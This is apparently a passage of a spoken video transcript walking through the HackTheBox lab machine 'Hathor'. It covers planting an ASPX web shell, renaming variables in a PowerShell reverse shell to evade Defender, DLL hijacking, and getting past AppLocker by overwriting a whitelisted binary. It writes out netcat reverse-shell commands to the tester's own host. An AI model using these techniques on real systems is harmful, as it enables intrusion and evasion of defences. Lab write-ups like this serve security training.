What's going on YouTube? This is IPSec, and we're doing Hathor from HackTheBox, which was an insane Windows machine that I absolutely loved, because if you look at the technical challenges or exploits or steps of this box, they're not really that tough. The tough thing comes with all the system hardening that's been put in place. If you remove the hardening, this box is probably a medium, but because it has like Applocker preventing unsigned code from running, the Windows Firewall only allowing certain programs to talk to the internet, Powershell Constrained Language Mode, and there's some other things like NTLM being disabled, like all those things that just make this box really tough. And I enjoyed learning how to navigate around them, and it really goes to show if the defender uses a defense in-depth methodology, even a vulnerable box can be made hard. So with that being said, let's just jump in. As always, we start off with an nmap, so -sc for default scripts, SV enumerate versions, OA output all formats, put in the nmap directory and call it Hathor, and then the IP address of 10.10.11.147. This can take some time to run, so I've already ran it. Looking at the results, we have 12 ports open. The first one is DNS on port 53, then we have HTTP on port 80, and its banner tells us it's an IIS server. And looking at the script, we have a robots.txt giving us a bunch of information. So we know like there's a capture image.ashx file, my page, need HTML, just general information about the website. And then the HTTP title is telling us this is MojoPortal. And if we looked into this, this is a CMS system, a content management system similar to like WordPress and stuff, just for ASP. So yeah, the next thing we have is kerberos, and it's telling us what the server time is. And since there is kerberos, chances are it's a domain controller. Looking down here, there is LDAP, and it's telling us the DNS name is wincorp.htb, and the full host name is hathor.wincorp.htb. So right away, I'm just going to add this into my host file. So sudo vi etc host. Then we can do 10.10.11.147. and do Hathor wincorp.htb and just windcorp.htb. Save that off. And going down, there is 445 open. There is secure LDAP. So nothing really too interesting here. We could try like an SMB client to list shares on this box. So 10.10.11.147. And when we do this, we get NT status not supported, not any type of authentication failure. So this is telling us that it's most likely NTLM is disabled. So we need to use kerberos to authenticate to this domain. And we could use a tool like kerberos to potentially enumerate valid users on the domain. But in the sake of time, I'm just going to go enumerate the web application. So 10.10.11.147. And we should get a page. There we go. And we see home, MojoPortal. It's taking a little bit of time to load. While that goes, we could Google like MojoPortal GitHub and see what this is. We could also do like a search exploit on MojoPortal and see there are 2 vulnerabilities. I'm looking for like a time of this vulnerability. It's not telling me the date. Let's see, if we go search exploit-x, we can see this one is in 2020, and the other one has a lower number, so I'm going to guess this is even older. Let's see, is there any date? I don't see a date here, but based upon the number being lower, I'm just assuming this is an older vulnerability. But going to the page, we just get a message that says page under construction. If we click on home, there is new page. If we click here, we get to page not found. We can click sitemap, and the site is pretty empty. If we click on login, we can get to an email and password. If I just try a random email like root@ipsec.rocks, put the password of password, try to log in, we see login failed. If I send this over to Burp Suite, we can see exactly how this request works. So I do password here. And oh man, that's sending a lot of information. So this is probably because it is .NET. We have a view state generator, validation, just a bunch of general things .NET websites do. Click forward, and it looks like it's probably returning that page. If I try like root@wincorp.htb, do password, we get login failed as well. If we do recover password, try root at ipsec.rocks, we get username not found. So chances are, if this was a user, we have a potential way to enumerate valid users, because I'd assume it would say like email sent. So validating users on a website is generally a low finding. Sometimes the website doesn't care. It's all dependent on, I guess, who's maintaining it. We can try creating a new account. So I'm going to create ipsec root at ipsec.rocks, password of password. Security question ASD DSA, I guess. And we'll do ipsec, create this account. Account has been created. So now if I go back home, it looks like it's pretty much the same thing. There's no login button down here, so I know I'm logged in. If I click this, there's just new page. If I click this little gear, there is a member list, and we can see admin. If I click on view profile, we can just see the name admin here. Nothing too interesting. I'm going to log out, and then we're going to go back to log in and validate that we have a way to enumerate valid users. So if I try to log in with this, or reset root at ipsec.rocks, it says, please answer your password question. I do DSA, and it's going to probably tell me it has emailed me. It's probably taking a while because email's not working on this box, but that does confirm that we can validate valid users. So the next thing I'm going to do is try to Google if there's any default passwords associated with MojoPortal. So MojoPortal default password. And we can see admin at admin.com for the email and admin for login name. We could go back here and go back again and try logging in with this. And it says, what is your username? So there is definitely an account here. So let's log in and try admin at admin.com and the password of admin. And we log in. And since we're administrator, we have more functions on this left-hand side. If I click on administration, we can go to system information, and it shows general information around the website, the ASP.NET version, operating system version, MojoPortal version. And we could probably compare this version to the search exploit and find out this is just too up-to-date for it to be vulnerable to any public exploits. That being said, if we go to File Manager, it does let us upload files. So whenever I try to upload a file, I'm going to do like an ASP shell on Windows, because we know it's executing ASPX files. So I'm just going to Google like 10c ASPX Reverse Shell, or maybe I should do Webshell. Or here, Webshell cmd.aspx. So this looks like it could be a good shell. I'm going to copy this. We can download it and then attempt to upload it to the box. So let's go click here, upload files, select, and then let's see, HTB, Hathor, cmd.aspx. And I'm going to intercept this request. File type is not allowed. So let's try uploading again. We can try changing the file type here. So I think like image JPEG, and we can forward this along. We still get file type not allowed. Upload it again. Let's try cmd aspx.txt. Forward it. And we have uploaded it. But since this is a .txt extension, it's probably not going to be executed. But we should see if we can figure out where this file exactly is. So I'm going to try to download this. And we can see it's making a database call to download it. So that doesn't help us. We want to find out exactly where this file is on the operating system. If I go to under construction, that sounds like exactly what we see here, page under construction. I can open this image in a new tab, and I see it's stored under data sites 1 media. So if I just go to this directory, we can't list it, But if I do cmd.aspx.txt, we can see this is where the file is stored. So if we can probably remove this .txt, so it's just cmd.aspx, we would be able to get code execution on this box. So if we went back to the GitHub, this is generally what I would be doing here. And it's interesting about this box. Let's see, go back to the GitHub. We can go into issues, and then I delete all the filters and kind of just glance at the issues. But we see one, vulnerability and legacy file manager. Now, I want to say this box was released in April of 2022, and this was created last month, October of 2022. And it's talking about there's a vulnerability in the legacy file manager. And let's see, when renaming files, one can change the extension. So let's play with this. If we try to rename it, and let's make sure we're intercepting, I can forward that request along, rename, and I'm going to change it to be just cmd.aspx. We can forward, and it says this type of file is not allowed. So let's try moving. So move it, and we probably need to turn intercept off until we decide on a location. So it's in media right now. We can try moving it to logos, I guess. Let's see, intercept on, select this, move. So now we're moving it into logos. And it doesn't look like it lets us change the name when we move it. I'm going to try just specifying the name. And not allowed. So let's try the very last option, which was copy. So enter a new name for it. I'm just going to say cmd.aspx, which it did for me. And then when we go, we didn't get an error message. It's not showing up in the file manager, but generally it said extension not allowed, right? So let's try going in sites media, cmd.aspx. And it's taking a second. Oh, it's probably trying to go through Burp Suite, maybe. There we go. We have a web shell on this box. So if I click on run, nothing happens. I'm going to try run. I'm going to change this to who am I? And then do run, and we get WinCorp Web. So we know we have code execution here. Now, the odd thing is, we did net user, and we got nothing. With a lot of just Windows shells in general, they don't redirect standard error to standard out. So I'm going to put this in quotes, and then we can do 2 and 1. So we're redirecting standard error to standard out. And when we do run, we just get access is denied. I think it said our user was web, so we can try this, and we can see the information about the web user. We could try administrator as well and get that information. So we can do some basic enumeration on this box. The very first thing I do is a whoami/priv command, so I can see if I have se impersonate, because if I do, then I would try to go with a potato style attack like rotten potato, juicy potato, whatever. I don't see se impersonate, so my first step is to probably get a reverse shell. So let's do make dir dub, and then cp user share machine, the shells, and then invoke, I think, PowerShell TCP one line. There we go. You can copy in this directory, and then we can edit the script. And we actually don't need to do this over a web server if we don't want to. We could just do a whole PowerShell encoding thing, which we'll do. So just change the IP out 10.10.14.8, put 9001 here, and then we can echo, or if not echo, cat this, and then I convert UTF-16 little endian, because this is how PowerShell encoding wants it, and base64-W0. We need a -T after I convert. And we should be able to paste this into our shell. So we can just do PowerShell-enc, paste it in, nc lvnp 9001. And when we hit enter, we'll see exactly what happens. Looking at my shell, I don't have anything. And then going back to the web page, we can see we have some type of error message. And if we look, it's got the script contains malicious content has been blocked by antivirus. So I guess we have to fix that. So let's just edit a few variables. Defender is very static signature based. So what I'm going to do is replace the client variable. And we're just going to call this C. So we can see all the clients have been replaced. And then I'm going to edit send back. So let's do send back. I'll replace that with SB. And then let's see, what else is there? We got send byte. So send byte, we'll go sbyte. And the weird thing is from, I forget what video we did it on, Defender likes flagging on this string. So I'm going to rename this. We'll do lowercase. And then get rid of the path. And then I'll put it equals like this. And instead of PS, I'll call shell. So all that line is like the bash prompt, right? So we changed the bash prompt from PS path this to probably shell this. So it just looks different. Didn't change the functionality at all, really. So let's re-encode this. Copy. NCLVNP 9001. And then we can go back. Replace the base 64. Hit enter. And let's see. What error message is it now? Preparing module for first use. And we see cannot create type, only core type supported in this language mode. And we're in probably constrained language, right? We could validate that by going back to our command. And oh my God, let's maybe if I get rid of find. There we go. And now I'm just going to replace this whole string. We can say execution context dot session state, and I'll put -c write host, and let's see what we have. What if I don't do write host? There we go. We have the language mode in constrained language. So this is a very limited version of PowerShell where we can't do a lot of the .NET reflection, which is required for getting our reverse shells. So what I'm going to do instead is try to upload netcat, right? So if I just go on my host, we can do locate nc64.exe, and I'm going to copy a version of netcat. We'll try this one. So cp this over here, and then we can get it on the box by going back into the file manager and just uploading it and renaming it. So I'm going to cp nc64.exe to give it the txt extension. And then we can just upload, select, and upload the txt. And with this, we can copy and remove it. So now netcat64 exe exists in this directory. We have to find exactly where it is on this server. So that'll be easy with our shell. We're just going to do dir c:, and it's probably going to be under inetpub, right? Oh, dir not c:, we just want slash. Inetpub. We also have this Get-BadPasswords thing that is interesting, but inetpub, probably www root. Then let's see. If I go back here, it's probably data sites. Is there a data here? There is. So we can do data sites 1. And I think it was media. And we have nc64.exe. I guess we didn't even have to rename it because we could have renamed it here. But now we can try executing this, right? nc64.exe-e cmd 10.10.14.8 9001. And when we try to run it, we see this program is blocked by group policy. And it's important you put this 2 and 1 here so you can see error messages from your shell. So this is probably going to be like Applocker, right? So let's do PowerShell -c Get-AppLockerPolicy -effective -XML. And this will output the AppLocker policy in XML format. We can copy this, let's just go up one directory, applocker.xml, paste it, and then I'm going to run Firefox applocker.xml so we can open this in Firefox and go through it. The first rule is allowing signed AP or AppX packages, which I think is from like the Windows Store or something. I don't know exactly what AppX is, but it's just allowing signed versions of those to run. Then we have DLL. So this is enabling Microsoft DLLs to run that are signed. The next thing we have is, this is odd, OS Drive Share Scripts 7zip64.dll is specifically allowed to run. So I'm going to create a notes.txt. We're just going to put that there because it's something we should take a look at. This next one looks like a default rule. All DLLs located in program files allow that execution. Then we have this OS Drive Get-BadPasswords and another DLL. So let's paste this just to keep track of all these weird exclusions. This one is loading DLLs located in the Windows folder. Then the next one, again, looks like another default. All DLLs located in program files. Local administrators to load DLLs. Let's see. This is exe, and this is enabling msdt.exe. I don't know exactly what that is. We can just move on. This is presentation host, more Microsoft things. Here's where we see something a bit unique because it's signed by WinCorp, the DC. And this looks like it's just allowing files that are signed from the certificate coming from the DC. The next thing we have is AutoIt. And this is like an, I guess, scripting program to automate a user on the box. So this is interesting. We should find exactly where AutoIt is because things signed by them can be ran. We have MSHTA. I think that's like running VB scripts and things. MS build, and this one is, MSHTA, MS build. Look, these are deny. So I think this is denying a bunch of lol bins. Install util, we can't run. Let's see, is there any other things? That's another MS build. But they're blocking access to some of these Windows executables that are known to execute code. Additionally, we have like blocking out of tasks. Tasks is a directory that's generally user writable. And if you look up here, some of these directories, or not directories, rules, enable any program inside of Windows to execute. But down here, we have some directories that are blacklisted, like this task directory. There's probably going to be a directory where the printers are stored because there's a user writable in Windows and common Applocker bypasses. Reg server 32, that's another lol bin that's blocked. Here's that printer directory I mentioned. Just anything put in this action is deny because, again, users can write under this directory. And as you saw above, there's a lot of things that just say allow execution under C:\Windows. So I'm going to kind of skip over a few of these because it looks like it's just like lol bins, general Windows stuff, directories. Let's see, is there anything else that's interesting? We have an exclusion specifically for bginfo64.exe. This is a common thing you'll find like sysadmins use. I don't see them use it nowadays, but it used to be super common to put information on the desktop of a PC. So if you ever logged into a server or something and saw the desktop on like the bottom right has like the host name, how much space is left, things like that. That's going to be the program BG info. I think it stands for like background info.exe. Bash, that is denied. So that's probably another lol bin. Machine keys. This is, I think, another directory users can write into. Let's see. Is there anything else that is interesting here? Reg ASM, tracing. I'm going to go with pretty much everything else seems standard Windows stuff. Just so many Applocker rules. Here's another one that has the certificate. So it's allowing members in the everyone group to run scripts that are located in, oh, that's a different rule. I think this is just another thing for scripts to be able to be ran that are signed by the certificate on the DC. We have another login.cmd. I don't know exactly what this script is, so we can put that there. And we could view these scripts, right? If I just go back here, get rid of this PowerShell thing and do dir/, there is a script. And I guess we can't see login.cmd. We could potentially go into the Get-BadPasswords. So if I do a dir, go in here, we can see there's a bunch of folders here. If we Google what Get-BadPasswords is, we can see it's a, I want to say, yeah, PowerShell script to get bad passwords in the domain. So it's going to do essentially a DC sync, pull a bunch of NT hashes, and then compare the NT hashes against a blacklist of NT hashes to discover if you have like summer 2019, January 2019, etc., as a valid password in your domain. So that's the purpose of this. Let's see, what directory is here? Custom. I wonder what run.vbs is. So I'm going to do type get-BadPasswords /run.vbs. And we can see it's going to create wscript.shell. Looks like it's creating some event ID, check passwords, and then running a command. And then this is the signature block that is signing the script, which enables it to run. I bet if we looked at this certificate, it would be one that comes from the domain controller. So let's check out the accessible directory. So I'm going to go paste this in, change the type to a dir, and we can see logs and info.txt. So I'm going to check out what info.txt is. So let's do type, and let's see, one for CSV, one for logs. Doesn't really give us too much information. Let's check out CSVs. So we can go back to dir and then replace this with CSVs. And we have a bunch of comma separated value files. So let's try checking one of these out. So we can do type. And what we see is the user Beatrice Mill has a leaked password. So I'm just going to go to CrackStation, and we can paste this NTLM hash in to see if it cracks quickly. And the reason why I'm doing it this way and not doing it through just like Hashcat itself is because if it's found by this whole bad password thing, we know it's a publicly known password because it doesn't do any cracking itself. It's just doing a check against a list like from CrackStation. So we have a password here. So I'm going to put v creds.txt, and let's see. We can put that as the password and go, where was it? This one, the user is Beatrice Mill. And before we try using this password, I just want to get a reverse shell to this box. I kind of skipped it. I didn't plan on skipping it. When I did this box manually, I got a reverse shell, but it just didn't flow naturally when I'm doing the video. The reason why we can't get a reverse shell is because netcat is blocked by group policy, but these whole ASPX files can run, right? So if a reverse shell was within an ASPX file and didn't like require executing a different executable, we'd be able to get it to run. So let's just Google the Insomnia shell ASPX, and we can just grab this raw. We can copy and then curl -o insomnia.aspx, save it, and then do the same thing we've been doing before and uploading the file. I'm just going to rename it to have .txt so we can upload it. So let's go to Insomnia, upload, and then where is it? Copy, remove the txt, and if I can spell it correctly, or at least spell it the way I spelled it before, we get this, right? So if I just do 10, 10, 14, 8, port 9001, am I still listening somewhere? I don't believe so. So let's just start up listener, click connect back, and we get a reverse shell. It's not going to be too helpful because we already found the file we needed to get the credential. The issue with this is going to be we have to make a kerberos ticket with this credential because SMB is disabled. So if we do like SMB client -u Beatrice Mill, then 10, 10, 11, 1, 47. Let's add a -l, capital L, and paste in this password. It's not going to say good password or bad password. It's going to say it is not supported. So this is where we have to create a kerberos ticket. And my favorite way to do that is through Impacket. You could just use the internal kerberos on Linux with kinit and stuff, but generally I just use the Impacket scripts. I'm not exactly sure why I prefer them this way. I think I just know the error messages better. So we're going to get a ticket granting ticket as wincorp.htb/Beatrice Mill. And then we have to copy her password. So let's grab this I love God or good password. So do this, then put the password here, and we can see it saved the credential. If we put a bad password, let's see what happens. We have pre-auth failed. If you put a bad username, I just add an S there, you get principal unknown. So I always like seeing these error messages. I'm just going to retrieve another ticket here. The key thing, one of the things about Impacket though, is whenever you generate a ticket, it's going to be valid for 10 years instead of 10 hours. So it is a bit noisier, but I don't really see too many detections on that. So now that we have a ticket, we can't immediately use it because if we try like SMB client -k for kerberos -capital L, we can say hathor.windcorp.htb. If we try this, it's going to error out because we didn't specify the kerberos ticket. So we want to do kerb5cc name is equal to Beatrice mill.cc cache. And then we're going to get no logon servers because we have to edit our kerberos file on our Linux machine. So etc kerb5.conf. And then I'm going to change scrm.local, which is another HackTheBox machine, to be wincorp.htb. And then for the KDC, we can do hathor.windcorp.htb. And it's going to sound silly, but the default realm, it is case sensitive. So want to make sure that is all in capitals up top there. So now when we run this, no logon server still. What? Windcorp.htb. Oh, there's a .scrm.local here. scrm.local windcorp.htb. There we go. Now everything is changed. Did that matter? It did not. Let's see. Let's open up Wireshark to see exactly what's going on. We ran that, and let's see, we get this SMB. Then it goes to 10.10.11.147. I'm going to try adding a -u for username, Beatrice Mill at wincorp.htb. Still no logon servers. Let me just try pinging this. We should be able to get to it, right? We can. So let's add to our host file resolve.conf, and we can specify name server 10.10.11.147. So we're using the domain controller as the DNS server. Maybe that's going to do it. And it looks like that was it. So we just had to update our resolve.conf. I'm guessing it tried to make some DNS request. I don't know exactly what happened there, but we can see SMB client is working. If we wanted to cheat, we can use CrackMapExec, and I am on version 5.4.0. I know with 5.1.0 it was actually broken, so always make sure to update CrackMapExec. They do so many new features, but we don't even have to update that kerberos file. So if I just go etc, let's do a sudo move krb, oh not move, we want it to exist. Let's cp krb5.conf to krb5.conf.hathor, and I'm just going to move my old kerberos file over top of this one. So if I less it, we can see it's back to serm.local. And let's go back to my main directory. Now we'll make sure this doesn't work because our kerberos thing is not set. And it's taking a while, but while that runs, let's just cheat and use CrackMapExec. So I'm going to do cme smb hathor.wincorp.htb, specify k for kerberos, d wincorp.htb-u, Beatrice Mill-p, I think it was 4 exclamation points, I love good 17, and then -- shares. So we'll see which one wins out. I'm guessing this isn't going to work at all because a kerberos file is incorrect. And then we have CrackMapExec going, and let's see what it does. I'm actually surprised it's taking this long. Let's see. What is it doing? We're doing DNS. It's failing to look up a bunch of Hathor.wincorp. What is this ping failure? Ping 10.10.11.147. Okay, I can talk. Oh, there we go. So we can see SMB client failed because, again, the kerberos file. So I'm just going to copy this one back so we have it for later in the video. If you want to see it, again, it's just the wincorp.htb. But CrackMapExec doesn't care about it. So it's always nice to use CrackMapExec to do kerberosy things because you don't have to worry about your machine's configuration nearly as much. So we do have this share file, or a share folder, that we have read-write access to as Beatrice Mill. So let's go spider it. I'm going to run the same command, but this time -m, capital, and we'll do spider plus. And actually, let me control C that. I'm going to run a time so you can see exactly how long this takes. I want to say it's probably going to take a minute and 30 seconds or 45 seconds. So I'm going to pause the video and let this command finish. We can see it took about a minute and 25 seconds, and the output is stored in this directory. So if we just cat this file, we can see it doesn't look too pretty. If we just pipe it over to JQ, then we can do a map_values and then keys, and this is much more manageable. And if you're confused by that all, you can always go to ipsec.rocks, which I'm trying to put up on the screen now, and you can search like JQ, and this is a really good video, the Manly Purse Bloodhound, where I talk about JQ, but you could even go further and do JQ Spider Plus and see videos of me explaining it potentially better. But back to this, we can see inside of the share, or the share named share, we have autoit x64.exe, bginfo, this 7zip64.dll, and that is interesting because in our notes, we do have, this is Applocker policies that we did earlier in the video. Bypasses, I'm going to call it, I guess. We do have that DLL, right? We also have bginfo64.exe and this login.cmd, which we don't have anywhere in this output. So if we can either access bginfo64.exe or modify this DLL, we can potentially get code execution on this box. So what I'm going to do is let's go to SMB client. So SMB client and access it, because I think this will be able to show us more information about this. I'm not exactly sure how to have like CrackMapExec show the file owner and things like that. And this is not either. So we could try just replacing these files to see if we can. So I'm going to first get bginfo64.exe to download it to my computer, and then we can put bginfo64.exe and we get access denied. If this was a DLL, let's try this real quick. So we have it right here. Let's cp bginfo to .dll and then just see if we could upload it. So let's just do DLL. And do we get access denied or does this go through? It does go through. So what I'm going to do is go into scripts and we're going to try the same exact thing, just replacing this 7zip64.dll. And my theory right now is we have autoit and a bunch of autoit scripts, this AU3, are using 7zip. So if we can put code here, maybe when autoit runs, we can get code execution through like a DLL injection. So what I'm going to do is just touch, and we're going to create a empty file. Actually, we can just get the file so we can always restore it afterwards. I can't stress that enough. Whenever you are going to modify something, always download a backup copy. And we can see we have downloaded it and uploaded it. So we know we have write access over this 7-zip DLL. And the next thing I'm going to do is enumerate the firewall. And this may not seem logical. I should have done it before when we were looking at Applocker rules. But it will save us a lot of time because this part, when I was just doing the box, took me forever to figure out because I kept trying to put like a reverse shell in this 7-zip 64 DLL and was getting blocked. So let us get a shell in the box. I'm going to do rlwrap nclvmp 9001. And then we can go back to here, send us a shell, and I can type PowerShell. And we can just do a get net firewall rule - policy store active store. And what this is going to do is list all the firewall rules. And it's going to be very verbose and show everything. And we don't care about everything. We kind of just care about the action set to block, right? So we can just do where.action, is it -eq? Block like this. I want to say that'll work. And now we just have a list of what is blocked. It's still a bit verbose, so I'm just going to do select display name, so we can just see all the display names of what is blocked. So C script 64 and 32, PS 32 and 62, ISC, this is PowerShell probably. This is PowerShell ISC, this is the registry editor, run DLL. So all these programs are being blocked from the internet. And that's one of the cool things about Windows Firewall is you can specify it not only at a program level, but you can also define it at a user level as well. But what I'm going to do now is, actually we can just go up. I want to look at exactly what this block autoit is, because if you just read this, it doesn't tell us what is blocked. Well, it just says the action is blocked, but how does it know what autoit is? So let's copy this name. And then after the policy store active store, we can specify name, put in that ID. So we only get this, and then we can pipe this over to get net firewall application filter. And we can see AutoIt is defined by this, right? We could do the same exact thing if we go up and you wanted to see exactly what, let's see, where's PS? PS ISE 64. Like, you may not know exactly what this means based upon the display name. So again, we can just copy this unique identifier and then replace it right here. And then hit enter. And now, oh, we know exactly what PS ISE is. It's this file, right? So this is how you can enumerate the firewall rules. But because AutoIt is blocked from internet access, we can't just create a DLL that sends us a reverse shell. So we're going to create a DLL that just executes some commands. The first thing I'm going to do is have it execute ping. And ping is going to work even though it's blocked because AutoIt is launching ping. So it should work. Or maybe there's a whitelist for ping that's just allowing it to run. Or maybe it's specifying TCP only. Let's see. Enable profile action block. I'm not exactly sure, but ping should work. So let's create a DLL. And this is, again, probably going to be off ipsec.rocks. If we just type DLL GCC lin, the template's going to be based upon this video, all about DLL hijacking. So if you want it explained, go to that video. I explain it a bit better there, but we're just going to include windows.h and then create the function and give it the handle, the reason that we attach, and let's see, reserved, okay. And then we can create a switch. And then we do case, I think it's DLL process attach system. We'll create that command in a second. Let's break here. And this, return true, end. So we have our DLL, and we can create a system call to do cmd.exe/ping 10.10.14.8, which is my IP address. Save it, and then hope we don't typo, and we'll know if we typo after we compile it with mingw. We want gcc -win32. And then we specify dlo.c, give it the name. This is going to be 7zip64.dll, and then -shared because it is a DLL. And error, let's see, expected semicolon after true. There we go. So now we have a DLL. If we just strings this 7-zip thing, all it's going to do is ping us. So I'm going to do sudo tcp dump -i ton0 icmp. And then where do we have a SMB client? So now we can just run this put command again. And we have uploaded the modified 7-zip DLL. And this is us pinging the box. I don't know why we're pinging. ps-ef grep ping. Something is just constantly pinging it. Or is that it pinging us and us responding? That was weird, right? There we go. So I think that is us. I don't know if that's a ping, though. I was expecting to see it go to us first and then us respond. But maybe not. Maybe this is it. It's not sending any more, so I think that's it. Let's just do ping 10.10.14.8, see what this looks like. And No, this is what I would expect. The Hathor coming to me and then me responding. So I don't know exactly what this is. Probably just random SMB communication. But because we don't see Hathor reaching back to us, I don't know if we have command execution. So let's see. Let's exit this. I just wanted to make sure I was where I thought I was. So grep cmd. This is it, cmd.exe/c ping. That looks good. We can copy this again, cd scripts, dir, and we see the size 91683. That's probably us anyways. Not close terminal. Copy, paste. Hit enter twice, and we're going to see if it eventually does ping us. And I had paused the video, but eventually we have a lot of spam. So we got more of these unreachable messages and then the ping. What I'm going to do is a different filter. I think we can do and source host is 10.10.11.147. And I think this will work because all these spam messages are starting with me sending to Hathor, right? So by doing this, if I just do a ping, let's just do one here. It's -n on Windows, not C. Go back here. And we did not. One packet captured. I think I need a -n maybe to not do DNS resolution. There we go. That's looking better. So this confirms if we see this, we got a ping, let us go back to SMB client, make sure we put a new copy, and then we're just going to wait and see if we get requests. And here we go. We have 4 different pings come in, so we have validated we have code execution. So the next step we want to do is edit our DLL to actually give us some useful information. And again, this piece of the box takes a very long time, so we're just going to speed it up by just knowing what to do, I guess, and cheating a little bit, right? So I'm just going to put this in single quotes to make my life easier. We want to do who am I /all, and then we can write this output to, I wonder if I want to do 2 slashes. Is it just 2 or 1? Probably 2 right now because I'm in a double quote. We can do users, public, and then please sub.text, right? And we probably should have left that ping there so we know it actually runs successfully. So I'm going to do ping 10.10.14.8. And the other thing we want to run, we want to, instead of doing who am I, let's run icacls. And what this is going to do is print the permissions of everything. So I'm going to do icacls and, whoops, did not mean to click. C:\share, like that. Copy this a few times because we want to get every file in here. Because we don't want to run this multiple times, right? Okay. So what we're doing, who am I? Icacls on the folder C:\share, icacls on C:\share and any file in it, and then going into the scripts directory as well, just saying exactly what we can overwrite. So now let's compile this. x86. There we go. Warning, string constant too long for its type. Did not like that, did it? I'm guessing it's still going to fail if I just change it to all double quotes, right? I don't think we actually need to do it this way. But let's just, for sanity's sake, test it out. Nope, it works. So let's now put a modified version up and do a TCP dump. and we'll see if that file exists after we exploit it. So we can do cd users public, and there should be oh, it's already there. Wow. Do we have a ping? We do. So I guess it happened as I was switching over to this, right? So let's take a look at our who am I. So we are GinaWild, and we got line wrapping issues. I'm just going to copy this. That's the start of it. Let's go to a new window. Please sub.txt, paste, ~s on this. There we go. So let's see. This is telling us all the groups we are. So we're a member of IT department and protected users. This is a Microsoft group, I believe. I think it just means you can't delete the user. And all these are also built in. So the key piece being IT department. Privileges. We don't have any dangerous privileges here. And oh God, that did not print well. Let's see. Let's just go back to this because we can actually read this output. I'm not sure what happened, but I digress. So C:\share. Nothing too interesting here. I guess IT department is OI. I think this is owner. Shoot. I was not prepared to explain icacls. So let's see. bginfo64.exe, IT department, WriteOwner. Who is the owner of this? I want to say all these I's mean inherited, right? And then we have the N. This is going to be no. So like web has no access. It's explicitly denied. This is read execute, I want to say, and then WriteOwner. System has full access. Administrators has full access. I don't know why I can't see the owner of this. If I had to guess, it's built-in administrators because it has the most privilege. Maybe one of these is owner. I don't know what DC is. But because IT department is here, this means we can take ownership of this and then be able to get read-write access to this, right? So we don't have to go through all the other files here. We can just go back to our DLL. Is this where we did it? That's not. I don't know what that MSF Venom is. That's from a long time ago, probably. So we can go edit our DLL. And what we're going to do is remove one of these carets. So every time this runs, it overwrites the full please subscribe file, erasing the previous output so we don't get confused. Then we're going to run a take own command. So if I just do take own /force C:\share bg info 64.exe. And then we're going to do an icacls on this again to see what it says. And I'm going to leave the ping here so we know it ran. And that looks good to me. So we can GCC. Got a semicolon. GCC upload and ICMP. Or a TCP dump, I should say. And I can just do a dir again on this. 927. What's the date? 928. Did that actually run as I was talking? No. So let us just wait for the pings to come in. So it's been a few minutes and it looks like the auto-wit task has been opened multiple times because we can see at 2035 and then again 2038. But the pings aren't important. It's just an indicator that it ran. So if I do a dir again, we can see it went from like 33,000 bytes to just 3,600. So let's type this file out to see exactly what it is. And we can see BG info. We are the owners. We know we did a take own command, but I don't see anything about my user. And my user is, I want to say it was Gina something, GinaWild. So what we need to do now is edit the cackles to give GinaWild access to this. Our shell is web, so we can't do it as web. We'll have to go back into the DLL and add another command here. So we're going to do a cackles and a /e, then /g. This is going to be edit, and this is going to be add. So we're going to edit the cackles to add GinaWild and give her full control. And I think that is all we have to do. Well, after that, I guess we want to execute this because, again, we are web. We want to execute, not execute BG info, but we want to copy our netcat shell. So copy C:// where was this? dir inetpub www root data, then sites1 media, I think. Yes, this is the file we want to copy. So /nc64.exe. We're going to copy netcat over top of BG info. And the reason why we're doing this is, if you remember back in our notes, when we were looking at Applocker rules, BG info is whitelisted, right? And it's a whitelist, or an allow list, not a deny list. So we can't execute nc64.exe because Applocker is just denying any executable it doesn't know. But by copying nc64.exe over top of bginfo64.exe, now Applocker is going to think it is that, because Applocker's rule is just based upon the file name. They didn't do a hash or a signature or anything like that with bginfo. So this will just allow us to execute it. So now with this, we should be able to just do a cmd/c, then c:/share bginfo64.exe. Always make sure to do double backslashes, and then -e cmd 10.10.14.8 9001. Okay, and I guess we won't do that ping anyways because we're not doing any type. Well, are we? I don't think we're doing any type of backgrounding, so I think the DLL is going to hang right here. But maybe the cmd/c is going to start a new process, open a window, and continue on. I honestly don't know. We'll find out. So I think this is all we need. If this doesn't work, my guess is going to be, oh, whoa, sharing violation. That should not happen. Huh. RLWrap. Wonder if I no longer have access to this. dir 7-zip. Okay, so maybe the cron was running and the DLL was in use. Maybe that's what that error message was. But as I was saying, I think I was on a different topic, but if I see the ping and I don't get a shell, my first guess is going to be I did not have access to the inetpub directory, and I'll probably move netcat to like c:/users public or c:/program data, copy it there, then use that place, because I'm not positive if GinaWild has access to this web server. So yeah, we'll just see what happens here. I hope I compiled it. Did I? Like, I'm having all the second guesses right now. Let's see. Packets captured. Yeah, I think I compiled it. I think that's this one right here, because that's me opening it and then compile. So pretty sure I compiled it. We can do a dir again, 3682, 939, and it is 949. So it's definitely has not been ran. So we'll just wait for a shell. So we have it doing a successful ping, but no shell. So let's take a look at this real quick. If I do a dir again, we have a different size here. So let's just view this, and then we're probably going to copy netcat to a different location. So let's see, GinaWild group, user claims. Did it only do? Oh, we don't have a cackles command anymore, I guess. So we do cd /share. We don't have access here. So let's go users, public. And then I'm going to copy my netcat so we can CP this here. If I do a dir, we see nc64.exe is in c:user public. We can icacls n64.exe. And let's see. Interactive. I'm guessing Gina has access to this, but I guess doesn't hurt to do a cackles command again to add GinaWild to this. Let's see. Maybe my cackles command was wrong. And that's why it didn't work. So let's see. /g user:perm. This is what I did. So G, GinaWild, and then F, full control. Does this say why it's erroring? Successfully processed one file. And then display. Wait, what? That's going to be weird behavior. Going up. Let's see. I don't see GinaWild here. Let's see. What are we doing wrong? Cackles /e edit ACL instead of that. Oh, we do the file name first? nc64.exe. I guess that's probably what went wrong. So thankfully, my troubleshooting of the whole process found the issue with their command, because I'm guessing we have read access to it, but this cackles command is wrong. c:/share bginfo64.exe, like this. There we go. Well, that's embarrassing. Do this. Then, whoops, I closed out of my share. dir cd scripts. And then we can put 7-zip. And just double check I have compiled it. Put it there. It copied, and now let's wait to see if we get some more pings or a reverse shell. And there we go. We have the reverse shell. And it's also important to note, we don't have the pings going on. And again, the reason why we did not get pinged is most likely that this is a blocking command, meaning it's not going to go to the next line until after this is finished. So as soon as we close the share, that's when we'll get pinged. And this is important because if you're doing DLL injection on just in general, you break the program if you don't thread everything. But it's a different point. So let's go do a who am I here to confirm. Yes, we are now GinaWild. I guess I can't clear the screen because I did not RL wrap, and I want to do a RL wrap. I should have. Shoot. Am I gonna get it in time? Probably not. I was hoping I'd be able to see the pings here, but let's get another share, not share, but another shell. I want to use RL wrap so I have the up and down arrow. So now I have a shell, and we are GinaWild. If we looked at her desktop, so users GinaWild desktop, we would see 